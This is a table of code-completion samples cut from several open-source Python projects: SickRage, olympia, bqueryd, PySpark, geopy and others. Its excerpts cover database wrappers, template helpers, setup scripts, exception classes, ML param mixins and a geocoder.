| repo_name | path | language | license | size (bytes) | score | prefix | middle | suffix |
|---|---|---|---|---|---|---|---|---|
SerialShadow/SickRage | sickbeard/db.py | Python | gpl-3.0 | 15,583 | 0.003016 | # Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickrage.tv
# Git: https://github.com/SiCKRAGETV/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os.path
import re
import sqlite3
import time
import threading
import sickbeard
from sickbeard import logger
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import ex
db_cons = {}
db_locks = {}
def dbFilename(filename="sickbeard.db", suffix=None):
"""
    @param filename: The sqlite database filename to use. Defaults to
                     sickbeard.db.
    @param suffix: The suffix to append to the filename. A '.' will be added
                   automatically, e.g. suffix='v0' makes dbfile.db.v0
@return: the correct location of the database file.
"""
if suffix:
filename = "%s.%s" % (filename, suffix)
return ek(os.path.join, sickbeard.DATA_DIR, filename)
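# Quick illustration of dbFilename (assuming sickbeard.DATA_DIR is '/data'):
#   dbFilename()                 -> '/data/sickbeard.db'
#   dbFilename(suffix='v0')      -> '/data/sickbeard.db.v0'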
class DBConnection(object):
def __init__(self, filename="sickbeard.db", suffix=None, row_type=None):
self.filename = filename
self.suffix = suffix
self.row_type = row_type
try:
if self.filename not in db_cons:
db_locks[self.filename] = threading.Lock()
self.connection = sqlite3.connect(dbFilename(self.filename, self.suffix), 20, check_same_thread=False)
self.connection.text_factory = self._unicode_text_factory
db_cons[self.filename] = self.connection
else:
self.connection = db_cons[self.filename]
if self.row_type == "dict":
self.connection.row_factory = self._dict_factory
else:
self.connection.row_factory = sqlite3.Row
except Exception as e:
logger.log(u"DB error: " + ex(e), logger.ERROR)
raise
    def _execute(self, query, args):
        if not args:
            return self.connection.cursor().execute(query)
        return self.connection.cursor().execute(query, args)
def execute(self, query, args=None, fetchall=False, fetchone=False):
"""
Executes DB query
:param query: Query to execute
:param args: Arguments in query
:param fetchall: Boolean to indicate all results must be fetched
:param fetchone: Boolean to indicate one result must be fetched (to walk results for instance)
:return: query results
"""
        if fetchall:
            return self._execute(query, args).fetchall()
        if fetchone:
            return self._execute(query, args).fetchone()
        return self._execute(query, args)
def checkDBVersion(self):
"""
Fetch database version
        :return: Integer indicating current DB version
"""
result = None
try:
if self.hasTable('db_version'):
result = self.select("SELECT db_version FROM db_version")
        except Exception:
return 0
if result:
return int(result[0]["db_version"])
else:
return 0
    def mass_action(self, querylist=None, logTransaction=False, fetchall=False):
"""
Execute multiple queries
:param querylist: list of queries
:param logTransaction: Boolean to wrap all in one transaction
:param fetchall: Boolean, when using a select query force returning all results
:return: list of results
"""
        # remove None or empty entries
        querylist = [i for i in querylist or [] if i]
sqlResult = []
attempt = 0
with db_locks[self.filename]:
while attempt < 5:
try:
for qu in querylist:
if len(qu) == 1:
if logTransaction:
logger.log(qu[0], logger.DEBUG)
sqlResult.append(self.execute(qu[0], fetchall=fetchall))
elif len(qu) > 1:
if logTransaction:
logger.log(qu[0] + " with args " + str(qu[1]), logger.DEBUG)
sqlResult.append(self.execute(qu[0], qu[1], fetchall=fetchall))
self.connection.commit()
logger.log(u"Transaction with " + str(len(querylist)) + u" queries executed", logger.DEBUG)
# finished
break
                except sqlite3.OperationalError as e:
sqlResult = []
if self.connection:
self.connection.rollback()
if "unable to open database file" in e.args[0] or "database is locked" in e.args[0]:
logger.log(u"DB error: " + ex(e), logger.WARNING)
attempt += 1
time.sleep(1)
else:
logger.log(u"DB error: " + ex(e), logger.ERROR)
raise
                except sqlite3.DatabaseError as e:
sqlResult = []
if self.connection:
self.connection.rollback()
logger.log(u"Fatal error executing query: " + ex(e), logger.ERROR)
raise
#time.sleep(0.02)
return sqlResult
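    # Example mass_action call (table name and values are illustrative only):
    #   my_db.mass_action([
    #       ["DELETE FROM history WHERE provider = ?", ("oldprovider",)],
    #       ["VACUUM"],
    #   ])
    # Each entry is a one-element [query] or a [query, args] pair; the whole
    # list is committed as a single transaction.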
def action(self, query, args=None, fetchall=False, fetchone=False):
"""
Execute single query
:param query: Query string
:param args: Arguments to query string
:param fetchall: Boolean to indicate all results must be fetched
:param fetchone: Boolean to indicate one result must be fetched (to walk results for instance)
:return: query results
"""
        if query is None:
return
sqlResult = None
attempt = 0
with db_locks[self.filename]:
while attempt < 5:
try:
                    if args is None:
logger.log(self.filename + ": " + query, logger.DB)
else:
logger.log(self.filename + ": " + query + " with args " + str(args), logger.DB)
sqlResult = self.execute(query, args, fetchall=fetchall, fetchone=fetchone)
self.connection.commit()
                    # get out of the connection attempt loop since we were successful
break
                except sqlite3.OperationalError as e:
if "unable to open database file" in e.args[0] or "database is locked" in e.args[0]:
logger.log(u"DB error: " + ex(e), logger.WARNING)
attempt += 1
time.sleep(1)
else:
logger.log(u"DB error: " + ex(e), logger.ERROR)
raise
                except sqlite3.DatabaseError as e:
logger.log(u"Fatal error executing query: " + ex(e), logger.ERROR)
raise
#time.sleep(0.02)
return sqlResult
def select(self, query, args=None):
"""
Perform single select query on database
:param query: query string
:param args: arguments to query string
:return: query results
"""
        sqlResults = self.action(query, args, fetchall=True)
        if sqlResults is None:
            return []
        return sqlResults
lavish205/olympia | src/olympia/amo/templatetags/jinja_helpers.py | Python | bsd-3-clause | 19,484 | 0.000103 | import collections
import json as jsonlib
import os
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.template import defaultfilters, loader
from django.utils.encoding import smart_text
from django.utils.functional import lazy
from django.utils.html import format_html as django_format_html
from django.utils.safestring import mark_safe
from django.utils.translation import (
get_language, to_locale, trim_whitespace, ugettext)
import jinja2
import waffle
from babel.support import Format
from django_jinja import library
from rest_framework.reverse import reverse as drf_reverse
from rest_framework.settings import api_settings
from olympia import amo
from olympia.amo import urlresolvers, utils
from olympia.constants.licenses import PERSONA_LICENSES_IDS
from olympia.lib.jingo_minify_helpers import (
_build_html, _get_compiled_css_url, get_css_urls, get_js_urls, get_path,
is_external)
from olympia.lib.cache import cache_get_or_set, make_key
# Registering some utils as filters:
urlparams = library.filter(utils.urlparams)
library.filter(utils.epoch)
library.filter(utils.isotime)
library.global_function(dict)
library.global_function(utils.randslice)
# Mark a lazy marked instance as safe but keep
# it lazy
mark_safe_lazy = lazy(mark_safe, unicode)
@library.global_function
def switch_is_active(switch_name):
return waffle.switch_is_active(switch_name)
@library.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@library.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@library.global_function
def locale_url(url):
"""Take a URL and give it the locale prefix."""
prefixer = urlresolvers.get_url_prefix()
script = prefixer.request.META['SCRIPT_NAME']
parts = [script, prefixer.locale, url.lstrip('/')]
return '/'.join(parts)
@library.global_function
def url(viewname, *args, **kwargs):
| """Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
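# Template usage sketch for the url() global (view name and arguments are
# illustrative):
#   {{ url('addons.detail', addon.slug, src='featured') }}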
@library.global_function
@jinja2.contextfunction
def drf_url(context, viewname, *args, **kwargs):
"""Helper for DjangoRestFramework's ``reverse`` in templates."""
request = context.get('request')
if request:
if not hasattr(request, 'versioning_scheme'):
request.versioning_scheme = api_settings.DEFAULT_VERSIONING_CLASS()
request.version = request.versioning_scheme.determine_version(
request, *args, **kwargs)
return drf_reverse(viewname, request=request, args=args, kwargs=kwargs)
@library.global_function
def services_url(viewname, *args, **kwargs):
"""Helper for ``url`` with host=SERVICES_URL."""
kwargs.update({'host': settings.SERVICES_URL})
return url(viewname, *args, **kwargs)
@library.filter
def paginator(pager):
return PaginationRenderer(pager).render()
@library.filter
def impala_paginator(pager):
t = loader.get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@library.global_function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from olympia.addons.models import Category
if app is None:
return [], []
# Fetch categories...
qs = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
# Now sort them in python according to their name property (which looks up
# the translated name using gettext + our constants)
categories = sorted(qs, key=attrgetter('weight', 'name'))
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, ugettext('Collections'), base + 'collections/')]
shown_types = {
amo.ADDON_PERSONA: urlresolvers.reverse('browse.personas'),
amo.ADDON_DICT: urlresolvers.reverse('browse.language-tools'),
amo.ADDON_SEARCH: urlresolvers.reverse('browse.search-tools'),
amo.ADDON_THEME: urlresolvers.reverse('browse.themes'),
}
titles = dict(
amo.ADDON_TYPES,
**{amo.ADDON_DICT: ugettext('Dictionaries & Language Packs')})
for type_, url in shown_types.items():
if type_ in app.types:
types.append(Type(type_, titles[type_], url))
return categories, sorted(types, key=lambda x: x.name)
class PaginationRenderer(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
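    # Worked example (max=10, so span=4): for page 7 of 20 pages the final
    # branch gives lower, upper = 3, 10, so page_range is [4..10] and dots are
    # rendered on both sides because 1 and 20 fall outside the window.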
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = loader.get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
def _get_format():
lang = get_language()
return Format(utils.get_locale_from_lang(lang))
@library.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return ugettext(u'Add-ons for {0}').format(app.pretty)
else:
return ugettext('Add-ons')
@library.global_function
@jinja2.contextfunction
def page_title(context, title):
title = smart_text(title)
base_title = page_name(context['request'].APP)
# The following line doesn't use string formatting because we want to
# preserve the type of `title` in case it's a jinja2 `Markup` (safe,
# escaped) object.
return django_format_html(u'{} :: {}', title, base_title)
@library.filter
def json(s):
return jsonlib.dumps(s)
@library.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
@library.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@library.filter
def external_url(url):
"""Bounce a URL off outgoing.prod.mozaws.net."""
return urlresolvers.get_outgoing_url(unicode(url))
@library.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@library.global_function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
seansu4you87/kupo | projects/MOOCs/udacity/ud120-ml/projects/outliers/outlier_cleaner.py | Python | mit | 753 | 0.007968 | #!/usr/bin/python
import math
def outlierCleaner(predictions, ages, net_worths):
"""
    Clean away the 10% of points that have the largest
residual errors (difference between the prediction
and the actual net worth).
Return a list of tuples named cleaned_data where
each tuple is of the form (age, net_worth, error).
"""
### your code goes here
data = []
for i in xrange(len(ages)):
data.append((ages[i], net_worths[i], _error(predictions[i], net_worths[i])))
sorted_data = sorted(data, key = lambda x: x[2])
print sorted_data
    length = int(0.9 * len(sorted_data))
return sorted_data[0:length]
def _error(expected, actual):
return math.pow(actual - expected, 2)
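# Usage sketch (variable names are illustrative): given equal-length arrays
# from a fitted regression,
#   cleaned = outlierCleaner(reg.predict(ages_train), ages_train, net_worths_train)
# keeps the 90% of points with the smallest squared residuals.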
visualfabriq/bqueryd | setup.py | Python | bsd-3-clause | 4,002 | 0.00075 | from __future__ import absolute_import
########################################################################
# File based on https://github.com/Blosc/bcolz
########################################################################
#
# License: BSD
# Created: October 5, 2015
# Author: Carst Vaartjes - cvaartjes@visualfabriq.com
#
########################################################################
import codecs
import os
from setuptools import setup, Extension, find_packages
from os.path import abspath
from sys import version_info as v
from setuptools.command.build_ext import build_ext as _build_ext
# Check this Python version is supported
if any([v < (2, 7), (3,) < v < (3, 5)]):
    raise Exception("Unsupported Python version %d.%d. Requires Python >= 2.7 "
                    "or >= 3.5." % v[:2])
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
# Prevent numpy from thinking it is still in its setup process:
__builtins__.__NUMPY_SETUP__ = False
import numpy
self.include_dirs.append(numpy.get_include())
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
    Build an absolute path from *parts* and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
def get_version():
version = {}
with open("bqueryd/version.py") as fp:
        exec(fp.read(), version)
return version
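# get_version() expects bqueryd/version.py to define the package version,
# e.g. (illustrative value):
#   __version__ = '0.1.0'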
# Sources & libraries
inc_dirs = [abspath('bqueryd')]
try:
import numpy as np
inc_dirs.append(np.get_include())
except ImportError:
    pass
lib_dirs = []
libs = []
def_macros = []
sources = []
cmdclass = {'build_ext': build_ext}
optional_libs = ['numexpr>=2.6.9']
install_requires = [
'bquery>=0.2.10',
'pyzmq>=17.1.2',
'redis>=3.0.1',
'boto3>=1.9.82',
'smart_open>=1.9.0',
'netifaces>=0.10.9',
'configobj>=5.0.6',
'psutil>=5.0.0',
'azure-storage-blob==12.0.0',
]
setup_requires = []
tests_requires = [
'pandas>=0.23.1',
'pytest>=4.0.0',
'pytest-cov>=2.6.0',
'codacy-coverage>=1.3.7',
]
extras_requires = []
ext_modules = []
package_data = {}
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Operating System :: Microsoft :: Windows',
'Operating System :: Unix',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
setup(
name="bqueryd",
version=get_version()['__version__'],
description='A distribution framework for Bquery',
long_description=read("README.md"),
long_description_content_type='text/markdown',
classifiers=classifiers,
author='Carst Vaartjes',
author_email='cvaartjes@visualfabriq.com',
maintainer='Carst Vaartjes',
maintainer_email='cvaartjes@visualfabriq.com',
url='https://github.com/visualfabriq/bqueryd',
license='GPL2',
platforms=['any'],
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_requires,
extras_require=dict(
optional=extras_requires,
test=tests_requires
),
packages=find_packages(),
package_data=package_data,
include_package_data=True,
zip_safe=True,
entry_points={
'console_scripts': [
'bqueryd = bqueryd.node:main'
]
}
)
knoguchi/nadex | nadex/rest_exceptions.py | Python | gpl-2.0 | 1,349 | 0 | # REST API exceptions
class HttpException(Exception):
"""
Class for representing http errors. Contains the response.
"""
def __init__(self, msg, res):
super(Exception, self).__init__(msg)
self.response = res
@property
def status_code(self):
return self.response.status_code
@property
def headers(self):
return self.response.headers
@property
def content(self):
return self.response.content
# 204
class EmptyResponseWarning(HttpException):
pass
# 4xx codes
class ClientRequestException(HttpException):
pass
# class Unauthorised(ClientRequestException):
# pass
# class AccessForbidden(ClientRequestException):
# pass
# class ResourceNotFound(ClientRequestException):
# pass
# class ContentNotAcceptable(ClientRequestException):
# pass
# 5xx codes
class ServerException(HttpException):
pass
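# Usage sketch (res is a hypothetical HTTP response object, e.g. from requests):
#   if res.status_code >= 500:
#       raise ServerException('server error', res)
#   elif res.status_code >= 400:
#       raise ClientRequestException(res.content, res)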
# class ServiceUnavailable(ServerException):
# pass
# class StorageCapacityError(ServerException):
# pass
# class BandwidthExceeded(ServerException):
# pass
# 405 and 501 - still just means the client has to change their request
# class UnsupportedRequest(ClientRequestException, ServerException):
# pass
# 3xx codes
class RedirectionException(HttpException):
pass
class NotLoggedInException(Exception):
pass
poldrack/openfmri | openfmri_paper/8.2_mds_wholebrain.py | Python | bsd-2-clause | 3,290 | 0.026748 | #!/usr/bin/env python
""" tsne_openfmri.py: code to run t-SNE on results from MELODIC ICA applied to the OpenFMRI dataset
requires:
- tsne.py from http://homepage.tudelft.nl/19j49/t-SNE.html
- Numpy
"""
## Copyright 2011, Russell Poldrack. All rights reserved.
## Redistribution and use in source and binary forms, with or without modification, are
## permitted provided that the following conditions are met:
## 1. Redistributions of source code must retain the above copyright notice, this list of
## conditions and the following disclaimer.
## 2. Redistributions in binary form must reproduce the above copyright notice, this list
## of conditions and the following disclaimer in the documentation and/or other materials
## provided with the distribution.
## THIS SOFTWARE IS PROVIDED BY RUSSELL POLDRACK ``AS IS'' AND ANY EXPRESS OR IMPLIED
## WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
## FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL RUSSELL POLDRACK OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
## CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
## SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
## ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
## NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as N
import matplotlib.pyplot as plt
import matplotlib.font_manager as mplfont
import os
from sklearn import manifold
from sklearn.metrics import euclidean_distances
from scipy.spatial.distance import pdist,squareform
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/clustering'
if 0:
#X=N.loadtxt('/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/ICA/datarun1_icarun1_200comp.txt')
    X=N.load('/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep/zstat_run1.npy').T
clf = manifold.MDS(n_components=2, n_init=1, max_iter=1000)
#dist=euclidean_distances(X)
    dist=squareform(pdist(X,metric='euclidean'))
t=clf.fit_transform(dist)
taskinfo=N.loadtxt('/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep/data_key_run1.txt')
tasknums=N.unique(taskinfo[:,0])
# compute scatter for each task
t_eucdist={}
mean_t_obs={}
for k in tasknums:
obs=N.where(taskinfo[:,0]==k)[0]
t_obs=t[obs,:]
mean_t_obs[k]=N.mean(t_obs,0)
t_eucdist[k]=N.mean(N.sqrt((t_obs[:,0]-mean_t_obs[k][0])**2 + (t_obs[:,1]-mean_t_obs[k][1])**2 ))
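# t_eucdist[k] is the mean Euclidean distance of task k's points from the task
# centroid in the 2-D MDS space, i.e. a per-task scatter measure that is used
# below to scale the centroid label font size.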
plt.clf()
plt.axis([-800,700,-700,700])
plt.scatter(t[:,0],t[:,1],s=0) # create axes
#f=open('tasklabels.txt','w')
for i in range(len(t)):
x,y=t[i,:]
plt.text(x,y,'%d'%taskinfo[i,0],fontsize=8,color='0.5') #,color=colors[i])
# f.write('%d\n'%dstask[copedata[i,0]][copedata[i,1]])
for i in tasknums:
plt.text(mean_t_obs[i][0],mean_t_obs[i][1],'%d'%i,fontsize=t_eucdist[i]*0.08)
#f.close()
# print legend:
plt.savefig(os.path.join(outdir,'wholebrain_mds_fig.pdf'),format='pdf')
N.save(os.path.join(outdir,'wholebrain_mds_solution.npy'),t)
holdenk/spark | python/pyspark/ml/param/shared.py | Python | apache-2.0 | 24,706 | 0.001376 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DO NOT MODIFY THIS FILE! It was generated by _shared_params_code_gen.py.
from typing import List
from pyspark.ml.param import *
class HasMaxIter(Params):
"""
Mixin for param maxIter: max number of iterations (>= 0).
"""
maxIter: "Param[int]" = Param(
Params._dummy(),
"maxIter",
"max number of iterations (>= 0).",
typeConverter=TypeConverters.toInt,
)
def __init__(self) -> None:
super(HasMaxIter, self).__init__()
def getMaxIter(self) -> int:
"""
Gets the value of maxIter or its default value.
"""
        return self.getOrDefault(self.maxIter)
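# Usage sketch: concrete estimators mix these param classes in and set
# defaults, e.g. (illustrative):
#   class MyEstimator(HasMaxIter, HasRegParam):
#       def __init__(self):
#           super(MyEstimator, self).__init__()
#           self._setDefault(maxIter=100, regParam=0.0)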
class HasRegParam(Params):
"""
Mixin for param regParam: regularization parameter (>= 0).
"""
regParam: "Param[float]" = Param(
Params._dummy(),
"regParam",
"regularization parameter (>= 0).",
typeConverter=TypeConverters.toFloat,
)
def __init__(self) -> None:
super(HasRegParam, self).__init__()
def getRegParam(self) -> float:
"""
Gets the value of regParam or its default value.
"""
return self.getOrDefault(self.regParam)
class HasFeaturesCol(Params):
"""
Mixin for param featuresCol: features column name.
"""
featuresCol: "Param[str]" = Param(
Params._dummy(),
"featuresCol",
"features column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasFeaturesCol, self).__init__()
self._setDefault(featuresCol="features")
def getFeaturesCol(self) -> str:
"""
Gets the value of featuresCol or its default value.
"""
return self.getOrDefault(self.featuresCol)
class HasLabelCol(Params):
"""
Mixin for param labelCol: label column name.
"""
labelCol: "Param[str]" = Param(
Params._dummy(),
"labelCol",
"label column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasLabelCol, self).__init__()
self._setDefault(labelCol="label")
def getLabelCol(self) -> str:
"""
Gets the value of labelCol or its default value.
"""
return self.getOrDefault(self.labelCol)
class HasPredictionCol(Params):
"""
Mixin for param predictionCol: prediction column name.
"""
predictionCol: "Param[str]" = Param(
Params._dummy(),
"predictionCol",
"prediction column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasPredictionCol, self).__init__()
self._setDefault(predictionCol="prediction")
def getPredictionCol(self) -> str:
"""
Gets the value of predictionCol or its default value.
"""
return self.getOrDefault(self.predictionCol)
class HasProbabilityCol(Params):
"""
Mixin for param probabilityCol: Column name for predicted class conditional probabilities. Note: Not all models output well-calibrated probability estimates! These probabilities should be treated as confidences, not precise probabilities.
"""
probabilityCol: "Param[str]" = Param(
Params._dummy(),
"probabilityCol",
"Column name for predicted class conditional probabilities. Note: Not all models output well-calibrated probability estimates! These probabilities should be treated as confidences, not precise probabilities.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasProbabilityCol, self).__init__()
self._setDefault(probabilityCol="probability")
def getProbabilityCol(self) -> str:
"""
Gets the value of probabilityCol or its default value.
"""
return self.getOrDefault(self.probabilityCol)
class HasRawPredictionCol(Params):
"""
Mixin for param rawPredictionCol: raw prediction (a.k.a. confidence) column name.
"""
rawPredictionCol: "Param[str]" = Param(
Params._dummy(),
"rawPredictionCol",
"raw prediction (a.k.a. confidence) column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasRawPredictionCol, self).__init__()
self._setDefault(rawPredictionCol="rawPrediction")
def getRawPredictionCol(self) -> str:
"""
Gets the value of rawPredictionCol or its default value.
"""
return self.getOrDefault(self.rawPredictionCol)
class HasInputCol(Params):
"""
Mixin for param inputCol: input column name.
"""
inputCol: "Param[str]" = Param(
Params._dummy(),
"inputCol",
"input column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasInputCol, self).__init__()
def getInputCol(self) -> str:
"""
Gets the value of inputCol or its default value.
"""
return self.getOrDefault(self.inputCol)
class HasInputCols(Params):
"""
Mixin for param inputCols: input column names.
"""
inputCols: "Param[List[str]]" = Param(
Params._dummy(),
"inputCols",
"input column names.",
typeConverter=TypeConverters.toListString,
)
def __init__(self) -> None:
super(HasInputCols, self).__init__()
def getInputCols(self) -> List[str]:
"""
Gets the value of inputCols or its default value.
"""
return self.getOrDefault(self.inputCols)
class HasOutputCol(Params):
"""
Mixin for param outputCol: output column name.
"""
outputCol: "Param[str]" = Param(
Params._dummy(),
"outputCol",
"output column name.",
typeConverter=TypeConverters.toString,
)
def __init__(self) -> None:
super(HasOutputCol, self).__init__()
self._setDefault(outputCol=self.uid + "__output")
def getOutputCol(self) -> str:
"""
Gets the value of outputCol or its default value.
"""
return self.getOrDefault(self.outputCol)
class HasOutputCols(Params):
"""
Mixin for param outputCols: output column names.
"""
outputCols: "Param[List[str]]" = Param(
Params._dummy(),
"outputCols",
"output column names.",
typeConverter=TypeConverters.toListString,
)
def __init__(self) -> None:
super(HasOutputCols, self).__init__()
def getOutputCols(self) -> List[str]:
"""
Gets the value of outputCols or its default value.
"""
return self.getOrDefault(self.outputCols)
class HasNumFeatures(Params):
"""
Mixin for param numFeatures: Number of features. Should be greater than 0.
"""
numFeatures: "Param[int]" = Param(
Params._dummy(),
"numFeatures",
"Number of features. Should be greater than 0.",
typeConverter=TypeConverters.toInt,
)
def __init__(self) -> None:
super(HasNumFeatures, self).__init__()
self._setDefault(numFeatures=262144)
def getNumFeatures(self) -> int:
"""
Gets the value of numFeatures or its default value.
"""
return self.getOrDefault(self.numFeatures)
class HasCheckpointInterval(Params):
"""
    Mixin for param checkpointInterval: set checkpoint interval (>= 1) or disable checkpoint (-1).
mthh/geopy | geopy/geocoders/mapzen.py | Python | mit | 5,724 | 0 | """
Mapzen geocoder, contributed by Michal Migurski of Mapzen.
"""
from geopy.geocoders.base import (
Geocoder,
DEFAULT_FORMAT_STRING,
DEFAULT_TIMEOUT
)
from geopy.compat import urlencode
from geopy.location import Location
from geopy.util import logger
__all__ = ("Mapzen", )
class Mapzen(Geocoder):
"""
Mapzen Search geocoder. Documentation at:
https://mapzen.com/documentation/search/
"""
def __init__(
self,
api_key,
format_string=DEFAULT_FORMAT_STRING,
boundary_rect=None,
country_bias=None,
timeout=DEFAULT_TIMEOUT,
proxies=None,
user_agent=None
): # pylint: disable=R0913
"""
:param string format_string: String containing '%s' where the
string to geocode should be interpolated before querying the
geocoder. For example: '%s, Mountain View, CA'. The default
is just '%s'.
:param tuple boundary_rect: Coordinates to restrict search within,
given as (west, south, east, north) coordinate tuple.
:param string country_bias: Bias results to this country (ISO alpha-3).
:param dict proxies: If specified, routes this geocoder's requests
through the specified proxy. E.g., {"https": "192.0.2.0"}. For
more information, see documentation on
:class:`urllib2.ProxyHandler`.
.. versionadded:: 0.96
"""
super(Mapzen, self).__init__(
format_string, 'https', timeout, proxies, user_agent=user_agent
)
self.country_bias = country_bias
self.format_string = format_string
self.boundary_rect = boundary_rect
self.api_key = api_key
self.geocode_api = 'https://search.mapzen.com/v1/search'
self.reverse_api = 'https://search.mapzen.com/v1/reverse'
def geocode(
self,
query,
exactly_one=True,
timeout=None,
): # pylint: disable=R0913,W0221
"""
Geocode a location query.
:param query: The address, query or structured query to geocode
you wish to geocode.
:type query: string
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
.. versionadded:: 0.97
"""
params = {'text': self.format_string % query}
params.update({
'api_key': self.api_key
})
if self.boundary_rect:
params['boundary.rect.min_lon'] = self.boundary_rect[0]
params['boundary.rect.min_lat'] = self.boundary_rect[1]
params['boundary.rect.max_lon'] = self.boundary_rect[2]
params['boundary.rect.max_lat'] = self.boundary_rect[3]
if self.country_bias:
params['boundary.country'] = self.country_bias
url = "?".join((self.geocode_api, urlencode(params)))
logger.debug("%s.geocode_api: %s", self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(url, timeout=timeout), exactly_one
)
def reverse(
self,
query,
exactly_one=True,
timeout=None,
): # pylint: disable=W0221
"""
Returns a reverse geocoded location.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of (latitude,
longitude), or string as "%(latitude)s, %(longitude)s"
:param bool exactly_one: Return one result or a list of results, if
available.
